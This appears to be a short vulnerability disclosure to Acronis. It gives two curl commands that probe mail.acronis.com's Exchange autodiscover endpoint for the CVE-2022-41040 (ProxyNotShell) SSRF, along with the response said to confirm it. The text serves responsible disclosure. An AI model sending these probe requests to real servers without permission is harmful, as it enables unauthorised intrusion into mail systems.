EPSS
Percentile
99.4%
Hello Acronis team,
Please run
curl -ksL -m5 -o /dev/null -I -w “%{http_code}” “https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync”
curl -ksL -m5 “https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync” | grep Protocol
and get following output
404 and {“Protocol”:“ActiveSync”,“Url”:“https://eas.outlook.com/Microsoft-Server-ActiveSync”}
Proving that mail.acronis.com is vulnerable to CVE-2022-41040
Poc video attached
SSRF can be used to for unauthorized actions or access to confidential data.
EPSS
Percentile
99.4%